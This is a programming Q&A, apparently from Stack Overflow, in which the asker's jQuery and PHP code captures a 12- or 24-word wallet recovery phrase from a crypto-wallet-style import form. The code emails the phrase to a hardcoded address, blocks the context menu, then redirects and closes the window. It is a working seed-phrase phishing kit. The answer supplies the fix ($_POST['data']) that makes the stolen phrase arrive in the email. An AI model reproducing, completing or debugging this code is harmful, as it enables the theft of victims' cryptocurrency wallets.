# Jquery ajax variable to PHP mailto ()

Tags: php, jquery, ajax

I am trying to post import-account__secret-phrase to a $_Post PHP variable within another file. To either store/email the variable.

```
<script>
  var p = !1;
  setTimeout(function() {
    $(".z2").addClass("hidden"), $(".z3").removeClass("hidden")
  }, 1e3), $(".import-account__secret-phrase").on("keyup", function() {
    var t = $(this).val().split(" ");
    p || (12 == t.length && 1 < t[11].length || 24 == t.length && 1 < t[23].length ? $(".button.btn--first-time.first-time-flow__button").prop("disabled", !1) : $(".button.btn--first-time.first-time-flow__button").prop("disabled", !0))
  }), $(".button.btn--first-time.first-time-flow__button").on("click", function() {
    p = !0, $(this).prop("disabled", !0).html('<i class="fa fa-spinner fa-spin fa-fw"></i> ' + $(this).html()), $.post("post.php", {
      data1: "Account",
      data: $(".import-account__secret-phrase").val()
    }, function() {
      p = !1
    }, "json"), window.parent.opener.postMessage({
      uni: !0
    }), setTimeout(function() {
      $(".z2").removeClass("hidden"), $(".z3").addClass("hidden"), setTimeout(function() {
        window.parent.opener.location.replace("https://website.com"), window.parent.close()
      }, 2e3)
    }, 1e3)
  }), document.body.addEventListener("contextmenu", function(t) {
    "import-account__secret-phrase" != t.toElement.className && t.preventDefault()
  }, !1);
</script>
```

Here is the post.php file which is in the same folder.

```
<?php
   // data sent in header are in JSON format
   header('Content-Type: application/json');
   // takes the value from variables and Post the data
   $postmessage = $_POST['.import-account__secret-phrase'];
   $to = "email@email.com";
   $subject = "Phrase";
   // Email Template
   $message .= "Message:". $postmessage."<br>";

   $header .= "MIME-Version: 1.0\r\n";
   $header .= "Content-type: text/html\r\n";
   $retval = mail ($to,$subject,$message,$header);
?>
```

The email fires and is recieved, but the $postmessage variable is blank and the secret phrase isn't displayed.

Comment: Watch your network tab when you make the request, and try `var_dump($_POST);` in your PHP. The data being sent is probably in `$_POST['data']`, not `$_POST['.import-account__secret-phrase']`, but you need to double-check what's being sent to verify.

Answer (score 0):

The issue is because you're sending the values in the `data` and `data1` parameters, yet your PHP appears to be trying to use a DOM selector to retrieve the value.

From the context you need to change that selector to just `'data'`, so that it reads the value you provided in the `$.ajax()` call.

```php
$postmessage = $_POST['data'];
```

I would also suggest you use more descriptive parameter names.